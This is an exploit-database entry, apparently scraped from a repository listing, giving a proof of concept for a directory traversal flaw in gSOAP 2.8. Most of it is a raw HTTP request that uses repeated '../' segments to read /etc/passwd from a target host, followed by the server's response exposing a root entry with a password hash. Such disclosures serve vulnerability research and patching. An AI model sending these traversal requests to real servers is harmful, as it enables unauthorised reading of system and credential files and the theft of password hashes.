e84e1285da
7 changes to exploits/shellcodes ScanGuard Antivirus 2020 - Insecure Folder Permissions Linear eMerge E3 1.00-06 - Remote Code Execution FUDForum 3.0.9 - Remote Code Execution Technicolor TD5130.2 - Remote Command Execution Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting gSOAP 2.8 - Directory Traversal Fastweb Fastgate 0.00.81 - Remote Code Execution
27 lines
No EOL
737 B
Text
27 lines
No EOL
737 B
Text
# Title: gSOAP 2.8 - Directory Traversal
|
|
# Author: Numan Türle
|
|
# Date: 2019-11-13
|
|
# Vendor Homepage: https://www.genivia.com/
|
|
# Version : gSOAP 2.8
|
|
# Software Link : https://www.genivia.com/products.html#gsoap
|
|
|
|
|
|
POC
|
|
---------
|
|
|
|
GET /../../../../../../../../../etc/passwd HTTP/1.1
|
|
Host: 10.200.106.101
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
|
Connection: close
|
|
|
|
Response
|
|
---------
|
|
HTTP/1.1 200 OK
|
|
Server: gSOAP/2.8
|
|
Content-Type: application/octet-stream
|
|
Content-Length: 51
|
|
Connection: close
|
|
|
|
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh |